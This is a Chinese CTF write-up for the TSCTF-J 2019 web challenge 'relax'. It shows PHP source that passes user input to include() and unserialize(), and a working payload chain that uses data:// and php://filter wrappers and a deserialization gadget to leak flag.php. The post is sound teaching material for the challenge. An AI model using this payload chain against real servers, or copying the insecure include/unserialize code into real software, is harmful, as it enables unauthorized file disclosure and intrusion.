欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

【TSCTF-J 2019】relax

程序员文章站 2022-03-09 21:04:33
...

题目地址http://ctf.merak.codes

打开是个没用的网站,扫描一下~
【TSCTF-J 2019】relax
访问/robots.txt,发现三个文件:

User-agent: *
Disallow: /relax.php
Disallow: /heicore.php
Disallow: /flag.php

其中只有/relax.php里有东西,查看源码:
【TSCTF-J 2019】relax
这个是aaencode代码,直接扔进控制台运行,或者在线解密:https://www.qtool.net/decode
【TSCTF-J 2019】relax
整理得:

$_ = $_GET['pw'];
$__ = $_GET['file'];
$___ = $_GET['(><)'];
if (isset($_) && (file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three")) {
    echo '<img src="./images/13.jpg" alt=""><br>';
    include($__);
} else {
    echo '<img src="./images/1.gif" alt="">';
}

其中file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three"可以用data://伪协议绕过;
下面还有个include($__);,想用file=flag.phpinclude来包含flag,却回显“It’s not that simple”,是我太天真了!
于是构造php://filter伪协议来读取heicore.phprelax.php的源码
heicore.php:

<?php
class Heicore{
	public $file;
	public function __destruct(){
		if(isset($this->file)){
			echo file_get_contents($this->file);
		}
	}
}

relax.php:

<?php
error_reporting(E_ALL^E_NOTICE^E_WARNING);
$_ = $_GET['pw'];
$__ = $_GET['file'];
$___ = $_GET['(><)'];
if(isset($_)&&(file_get_contents($_,'r')==="Two thousand three hundred and thirty-three"))
	{
		echo '<img src="./images/13.jpg" alt=""><br>';
		if(preg_match("/flag/i",$__))
			{
				echo "It's not that simple";
				exit();
			}else{
				include($__);
				unserialize($___);
			}
		}else
		echo '<img src="./images/1.gif" alt="">';  }    ?>

终于拿到了完整的源码,的确是过滤了flag
可以看到heicore.php中的析构函数会输出$file,所以把它包含进来,并让其成员$file等于flag.php,由于调用了函数unserialize(),我们就利用反序列化触发魔术方法__destruct()来输出flag;

<?php
class Heicore {
	public $file = 'php://filter/read=convert.base64-encode/resource=flag.php';

}
$a = new Heicore();
$b = serialize($a);
echo $b;
#O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}

构造的payload:

?pw=data:text/plain,Two%20thousand%20three%20hundred%20and%20thirty-three&file=heicore.php&(><)=O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}

【TSCTF-J 2019】relax
解base64
【TSCTF-J 2019】relax

相关标签: CTF-Web